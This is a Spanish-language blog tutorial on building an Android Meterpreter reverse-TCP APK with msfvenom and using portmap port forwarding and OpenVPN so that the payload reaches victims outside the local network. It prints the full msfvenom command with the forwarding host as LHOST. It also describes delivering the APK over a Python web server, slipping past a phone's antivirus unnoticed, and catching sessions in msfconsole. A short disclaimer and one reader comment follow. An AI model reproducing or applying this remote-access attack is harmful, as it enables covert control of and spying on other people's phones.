Payload fuera de la red local

 

Hackeando Android fuera de red local con portmap


Bien hace tiempo hice un post en el que les enseñaba como hacer un Payload para hackear dispositivos Android pero eso era solo para usarlo dentro de nuestra misma red.


Bien, en este nuevo post les voy a enseñar como hacer lo mismo pero esta vez podremos usarlo también fuera de la red local, es decir podemos infectar a cualquier dispositivo que necesitemos.


¿Cómo vamos a lograr esto? Para esto vamos a usar un servicio de redirección de puertos, en este caso vamos a usar los servicios de portmap puedes encontrar el tutorial de su configuración Aquí



Este proceso lo voy a realizar desde termux pero usando Kali-linux vía ssh. Pero si tienes metasploit en termux puedes seguir todo estos pasos pero en termux.


Ya hice un post explicando el proceso de creación del APK así que no voy a entrar en tantos detalles, doy por hecho que ya saben crear un APK con msfvenon.






Bien, podemos ver que el comando es igual al de la otra vez ¿Notan la diferencia? Bueno, voy a explicar el comando es el siguiente:




msfvenom -p android/meterpreter/reverse_tcp LHOST=Dark34-25514.portmap.host LPORT=25514 R > prueba.apk

Dónde dice LHOST: vamos a colocar el enlace de portmap.host

Y en el LPORT: vamos a colocar también el puerto que nos dió portmap.

Bien con esto ya tenemos todo lo necesario para hacerlo el APK así que vamos a dar enter y si todo salió bien vamos a ver algo tal que así: 



















Ya tenemos el APK creado así que voy a usar python para crear un servidor simple para poder enviar el APK a mi Android vamos allá.


Vale aquí ya habilité el servicio de servidor con python así que ahora me dirijo al navegador y apunto mi IP de Kali para poder acceder al archivo APK. 



Aceptamos las advertencias y le damos a descargar, y la descarga comienza de inmediato y como es muy ligero la APK se termina de bajar en un instante.





Pero antes de instalarlo todavía tenemos que hacer algunas cosas así vamos de vuelta a la terminal. 
Portmap nos da un archivo.ovpn y para usarlo tenemos que poner el siguiente comando:

openvpn --congif tu_archivo.ovpn 
Aclaro que esto se hace en kali-linux, si tú quieres hacerlo desde termux debes de descargar la app de openvpn que está disponible en play store enlace de tutorial (aquí) así debe de veras si la conexión fue exitosa con los servicios de openvpn.




Ahora vamos a confiar la consola de msfconsole para poder esperar la conexión de nuestro payload, aquí les muestro las configuraciones que son necesarias para que todo funcione, hacemos todo los ajustes y damos en exploit: 




Listo con esto ya tenemos todo lo necesario, instalamos la aplicación en nuestro dispositivo:




Esto es un espectáculo vemos que el antivirus que trae los dispositivos redmi lo pasa como aplicación totalmente confiable. 

Instalamos la app y abrimos la aplicación, a simple vista parece que no pasa nada, pero nosotros por detrás ya estaríamos ganando una sesión


Y bien ahora ya hemos ganado una sesión meterpreter y tenemos los comando necesarios para poder hackear (risa malvada) 



Los comandos son muchos así que dejen volcar su imaginación y vayan probando los comandos disponibles. Aclaro que esta sesión caduca una vez que la víctima apaga el celular, hay formas de ganar persistencia pero ese es otro tema para un futuro post. Espero que les guste este tutorial y recuerden hacerlo bajo sus propios riesgos ya que hacer este tipo de ataques sin consentimiento es delito. Hasta la próxima.



Comentarios

  1. bueno y no me salio mi amigo la verdad que estuve 7 horas tratanto pero probando poner run , me sale error como que el comando run no es el correcto.

    ResponderBorrar

Publicar un comentario

Entradas más populares de este blog

Cómo instalar hydra en termux 2024

Cómo instalar metasploit en termux sin errores